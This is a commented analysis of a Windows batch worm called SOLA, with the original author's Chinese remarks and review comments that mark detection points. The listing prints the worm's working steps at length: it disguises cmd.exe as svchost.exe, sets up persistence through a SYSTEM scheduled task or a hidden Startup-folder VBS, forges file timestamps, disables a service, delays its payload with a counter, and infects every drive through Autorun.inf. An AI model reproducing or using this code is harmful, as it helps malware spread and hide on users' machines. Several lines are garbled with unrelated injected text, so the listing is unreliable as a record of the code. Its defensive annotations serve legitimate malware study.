rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll
rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll
rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll //竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...
del Function.exe
:: ---------------------------------------------------------------------------
:: Mainsetup: defines command aliases and drops a renamed copy of cmd.exe.
:: %sola% and %setup% are directories assigned earlier in the script (not
:: visible in this excerpt).
:: ---------------------------------------------------------------------------
:Mainsetup
:: Built-in command names are stored in variables so that later lines read
:: %A0001% / %A0002% / %A0003% instead of copy / attrib / echo. Presumably this
:: is light obfuscation against plain-string matching (TODO confirm intent).
:: When reviewing the rest of the listing, expand these aliases mentally.
set A0001=copy
set A0002=attrib
set A0003=echo
:: Display name of a Windows service; it is passed to `net stop` under the
:NoAutoPlay label. No A0004 is defined in the visible lines.
set A0005=Shell Hardware Detection
:: Dump the process list to a scratch file, then take the first token of the
:: line(s) matching "svchost.exe" (case-insensitive), i.e. the image name as
:: tasklist prints it. If several lines match, the last one wins.
tasklist >%sola%\task.txt
FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i
:: copy cmd.exe -> %sola%\<svchost image name>. The result is a command
:: interpreter stored under a system-process name outside system32.
:: Detection point: a file named svchost.exe in a non-system directory whose
:: content matches cmd.exe.
%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%
:: Remove the scratch file.
del %sola%\task.txt
:: ---------------------------------------------------------------------------
:: Tasks: replaces %systemroot%\Tasks\Tasks.job and switches the scheduled
:: task named "Tasks" to run as NT AUTHORITY\SYSTEM. On failure control goes
:: to :TaskFail (Startup-folder fallback), otherwise to :TaskSuc.
:: ---------------------------------------------------------------------------
:Tasks
:: attrib -s -h -r: clear system/hidden/read-only so the old job file can be
:: deleted.
%A0002% %systemroot%\Tasks\Tasks.job -s -h -r
del %systemroot%\Tasks\Tasks.job
:: `date <value>` changes the system date. Date and RealDate are not assigned
:: in the visible lines; presumably they are set earlier in the script. The
:: set / write file / restore pattern used throughout this listing looks like
:: timestamp manipulation of the dropped files (TODO confirm).
:: Detection point: repeated system-date changes made by a script.
date %Date%
:: NOTE(review): the next line is damaged. After "%systemroot%\" the hosting
:: page injected unrelated English filler text; the original command (most
:: likely the one that places the new Tasks.job) is lost and cannot be
:: reconstructed from this page.
tasks.xxx %systemroot%\。the check timer is an example of a very simple watchdog type timer. itmonitors all the other standard demo tasks, and the register check tasks,and provides visual feedback as to the system status using an led.。2.people of the same personality type working together create a work environment that fits their type. for example, when artistic persons are together on a job, they create a work environment that rewards creative thinking and behavior -- an artistic environment.。
:: Change the run-as account of the scheduled task "Tasks" to SYSTEM.
:: A non-zero errorlevel sends control to the fallback persistence path.
:: Detection point: schtasks /change /ru SYSTEM issued from a batch file.
schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail
:: Restore the real system date.
date %RealDate%
goto TaskSuc
:: ---------------------------------------------------------------------------
:: TaskFail: fallback persistence used when the scheduled task could not be
:: changed. It writes a VBScript launcher into the All Users Startup folder.
:: ---------------------------------------------------------------------------
:TaskFail
:: Switch to the system drive, then into the All Users profile.
%homedrive%
cd "%ALLUSERSPROFILE%"
:: The path below is the Chinese-localized "Start Menu\Programs\Startup".
:: Analyst's inline note (translated): "This code does the same job as the
:: sections above: it achieves auto-start."
cd 「开始」菜单\程序\启动 //这段代码和上面几段作用相同,都是实现自启动.
date %Date%
:: Start a new SOLA.VBS in the Startup folder (echo ... > file).
%A0003% On Error Resume Next>SOLA.VBS
:: NOTE(review): the next line is damaged. It holds three repeated VBScript
:: fragments injected by the hosting page, not a batch command. The original
:: presumably appended the WScript.Shell creation line to SOLA.VBS (TODO
:: confirm against a clean sample).
set ws = createobject("wscript.shell")。set ws=wscript.createobject("wscript.shell")。set ws = createobject("wscript.shell") 。
:: Append the launch line: run the renamed cmd.exe copy (%sola%\svchost.exe)
:: with "/c %sola%\SOLA.BAT -Run"; window style 0 means no visible window.
%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS
:: Keep a second copy of the launcher in %sola%.
%A0001% SOLA.VBS %sola%\SOLA.VBS
:: Write a marker file named NoTasks. HIDESE~1 is the 8.3 short name of a
:: directory under %systemroot%\Fonts; its long name is not visible here.
:: Detection points: SOLA.VBS in the All Users Startup folder; any
:: non-font content under %systemroot%\Fonts.
%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasks
date %RealDate%
:: ---------------------------------------------------------------------------
:: TaskSuc: reached directly after a successful schtasks change, and by
:: fall-through from :TaskFail. Hides the job file and installs sleep.exe.
:: ---------------------------------------------------------------------------
:TaskSuc
:: attrib +s +h +r: mark Tasks.job system, hidden and read-only so it does
:: not appear in a default Explorer view.
%A0002% %systemroot%\Tasks\Tasks.job +s +h +r
:: The copy is bracketed by date changes (see the Date/RealDate pattern);
:: presumably so the dropped file carries a chosen timestamp (TODO confirm).
date %Date%
:: copy %setup%\sleep.exe into system32. The binary's origin and content are
:: not shown on this page.
%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe
date %RealDate%
:: ---------------------------------------------------------------------------
:: NoAutoPlay: stops the Shell Hardware Detection service and prepares a .reg
:: file that sets the service's Start value to 4 (disabled).
:: Detection points: ShellHWDetection stopped or disabled without an admin
:: change record; Regedit.reg under %systemroot%\Fonts\HIDESE~1\.
:: ---------------------------------------------------------------------------
:NoAutoPlay
:: %A0005% expands to "Shell Hardware Detection" (set under :Mainsetup).
net stop "%A0005%"
:: NOTE(review): the next line is damaged. Only the leading
:: "echo windows registry editor version 5.00>%systemroot%\" belongs to the
:: script (the .reg header line); everything after it is unrelated text
:: injected by the hosting page. The original target path is cut off, but is
:: presumably the same Regedit.reg file appended to below.
echo windows registry editor version 5.00>%systemroot%\。请将下面的代码保存编码格式为 unicode 的 reg 文件, 然后以管理员身份导入到注册表, 即可恢复 32 位 internet explorer 8 打开一个页面中链接的功能. 1. 适用于32位 windows 7 系统. 请复制以下代码 windows registry editor version 5.00 [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}] @=&ihlinksite& [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}\nummethods] @=&7& [hkey_local_machine\software\classes\interface\{79eac9c2-baf9-11ce-8c82-00aa004ba90b}\proxystubclsid32] @=&{a4a1a128-768f-41e0-bf75-e4fddd701cba}& [hkey_local_machine\software\classes\interface\{79eac9c3-baf9-11ce-8c82-00aa004ba90b...。windows registry editor version 5.00[hkey_local_machine\system\currentcontrolset\control\session manager]"excludefromknowndlls"=hex(7):6c,00,70,00,6b,00,2e,00,64,00,6c,00,6c,00,00,00,\00,00。
:: Append the service key and "Start"=dword:00000004 to Regedit.reg.
:: The command that imports the file is not present in the visible lines.
%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\HIDESE~1\Regedit.reg
%A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.reg
:: NOTE(review): the next line is not part of the script. It is Chinese
:: filler text injected by the hosting page (generic advice about renaming
:: regedit.exe for a different infection); whatever command stood here is
:: lost.
2、找到regedit.exe文件,将这个文件改名为regedit.com,然后双击打开。(2) 在windows目录中查找regedit.exe.sys 文件,如果找到则证明病毒存在,将同目录下的regedit.exe文件删除,将regedit.exe.sys文件改名为regedit.exe。(2) 在windows目录中查找regedit.exe.sys文件,如果找到则证明病毒存在,将同目录下的regedit.exe文件删除,将regedit.exe.sys文件改名为regedit.exe。
::End of Install
:: Jump to the :End label (not visible in this excerpt). The `if` that
:: follows `goto` on the same line is presumably never reached; verify.
goto End&if errorlevel 1 exit
::End of Install
:: ---------------------------------------------------------------------------
:: Run: start of the section that follows the install section (which ends
:: with `goto End`). The launcher written under :TaskFail passes "-Run" to
:: SOLA.BAT; the dispatch on that argument is not visible in this excerpt.
:: Records the two persistence locations used by the installer.
:: ---------------------------------------------------------------------------
:Run
:: All Users Startup folder (Chinese-localized path).
set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动
:: Scheduled-tasks directory. The trailing "//..." is the article author's
:: annotation, not batch syntax (translated: "auto-start"); as written it
:: would become part of the variable's value.
set taskroot=%systemroot%\Tasks //自启动
:: ---------------------------------------------------------------------------
:: RunTimeChk: a run counter kept in %sola%\RunTime.txt. It starts at 50, is
:: decremented on each pass, and control jumps to :Virus (the payload label,
:: not visible in this excerpt) once the value is <= 0. The delay means a
:: host can be infected long before any visible symptom appears.
:: Detection point: %sola%\RunTime.txt containing "!<number>".
:: ---------------------------------------------------------------------------
:RunTimeChk
:: First run: seed the counter file with "!50". The "!" prefix presumably
:: serves as a delimiter for the parser line below and keeps a single-digit
:: value from being read as a redirection handle (TODO confirm).
if not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txt
:: NOTE(review): the next line is damaged. It contains three unrelated
:: `for /f` fragments injected by the hosting page. The original presumably
:: read the number from RunTime.txt into %RunTime%; that line is lost, so
:: RunTime is never assigned in the visible code.
for /f "tokens=* delims= " %%i in (yxkmp4dir.txt) do call :ss "%%i"。for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call ipchack.bat %%i %%j %%k。for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k。
:: Counter exhausted -> payload.
if /i %RunTime% leq 0 goto Virus
:: Otherwise decrement and persist. Variable names are case-insensitive, so
:: %Runtime% and %RunTime% are the same variable.
set /a RunTime=%Runtime%-1
echo !%Runtime%>%sola%\RunTime.txt
:: ---------------------------------------------------------------------------
:: Diskchk: runs a short-lived helper VBScript, then walks drive letters C-Z
:: and spreads to every writable volume through Autorun.inf.
:: Indicators visible on this page: Autorun.inf containing "SOLA_1.0_2.0";
:: a system+hidden \SOLA directory at a drive root holding SOLA.BAT and
:: Function.dll; scratch file \solachk1; scripts under
:: %systemroot%\Fonts\HIDESE~1\.
:: Mitigation: keep AutoRun/AutoPlay disabled for removable and fixed media,
:: and alert on Autorun.inf creation at volume roots.
:: ---------------------------------------------------------------------------
:Diskchk
:: Build RecentInf.VBS in the hidden Fonts subdirectory.
echo On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS
echo set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf.VBS
:: NOTE(review): the next line is damaged. It is unrelated text injected by
:: the hosting page (fragments of a different setup.bat and a C string).
:: The remaining lines of RecentInf.VBS are lost, so what the helper script
:: does cannot be determined from this page.
endlocal-----------------------------------------------------------------以下是setup.bat@echo off。echo lock.reg反注册成功------------------------------------------------------双击setup.bat即可安装。char *reg10="a.regwrite \\"hklm\\\\software\\\\microsoft\\\\command processor\\\\autorun\\",\\"%systemroot%\\\\run.bat&system32.vbe\\",\\"reg_sz\\"\\n"。
:: Execute the helper, then delete it to leave no script on disk.
cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS
del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS
:: Probe each letter with `vol`; on error a variable named after the letter
:: is set to 1. The loop below does not consult those variables.
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1
:: Per drive: write and read back \solachk1 as a writability test, then look
:: for the marker "SOLA_1.0_2.0" in Autorun.inf. If the marker is absent,
:: the existing Autorun.inf has its attributes cleared and is overwritten,
:: and a \SOLA directory is populated and marked system+hidden+read-only.
:: The "©" characters are a rendering artifact of the hosting page; the line
:: is not valid batch as shown.
:: Analyst's inline note (translated): "I still have not managed to get the
:: file, but judging by the code it should infect every drive."
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1 attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT© /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r //文件我还是没搞到,不过看意思应该是使每个盘都感染病毒